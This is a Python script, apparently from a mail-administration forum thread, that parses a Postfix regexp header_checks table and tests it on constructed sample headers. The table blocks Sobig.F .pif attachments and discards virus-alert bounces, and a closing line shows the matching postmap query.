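"""Offline evaluation of a Postfix regexp: header_checks table.
Added example; rules 2 and 3 and all sample headers are constructed."""
import re

HEADER_CHECKS = r"""
# Sobig.F attachment names from the thread (dot escaped so it is literal)
/filename=.*(your_details|your_document|document_all)\.pif/ REJECT
# broader: any .pif attachment, whichever MIME header names it
/^Content-(Disposition|Type):.*name=.*\.pif/ REJECT
# auto-replies from scanners that answer the forged sender address
/(Virus found|VIRUS ALERT)/ DISCARD
"""

RULE_RE = re.compile(r"^(!)?/(.*)/([imx]*)\s+(\S.*)$")


def load_regexp_table(text):
    """Parse '/pattern/flags action' lines into (negate, compiled_regex, action)."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError(f"unparsable rule: {line}")
        negate, pattern, flags, action = m.groups()
        # Postfix: case-insensitive by default; 'i' toggles that off.
        reflags = 0 if "i" in flags else re.IGNORECASE
        if "m" in flags:
            reflags |= re.MULTILINE
        if "x" in flags:
            reflags |= re.VERBOSE
        rules.append((negate == "!", re.compile(pattern, reflags), action))
    return rules


def check_header(header_line, rules):
    """Action for one header line; first matching rule wins, None if no rule fires."""
    for negate, rx, action in rules:
        if bool(rx.search(header_line)) != negate:
            return action
    return None


def check_message_headers(headers, rules):
    """(action, offending header) for the first header that triggers a rule."""
    for h in headers:
        action = check_header(h, rules)
        if action:
            return action, h
    return None, None


# Constructed sample messages: Sobig-style attachment, a scanner bounce, and a clean mail.
SOBIG_HEADERS = [
    "From: <someone@example.com>",
    "Subject: Re: Details",
    "Content-Type: application/octet-stream; name=your_details.pif",
    "Content-Disposition: attachment; filename=your_details.pif",
]
BOUNCE_HEADERS = [
    "From: postmaster@example.net",
    "Subject: VIRUS ALERT - your message was infected",
]
CLEAN_HEADERS = [
    "Subject: Re: Filtering sobig with postfix",
    "Content-Disposition: attachment; filename=header_checks.txt",
]

if __name__ == "__main__":
    rules = load_regexp_table(HEADER_CHECKS)
    for label, hdrs in (("sobig", SOBIG_HEADERS), ("bounce", BOUNCE_HEADERS), ("clean", CLEAN_HEADERS)):
        print(label, "->", check_message_headers(hdrs, rules))
```

On a real Postfix host the equivalent check is `postmap -q "Content-Disposition: attachment; filename=your_details.pif" regexp:/etc/postfix/header_checks`, which prints the action the table returns for that line; and, as the reply says, running plain `postmap` to build an indexed map only applies to hash:, dbm: and btree: tables.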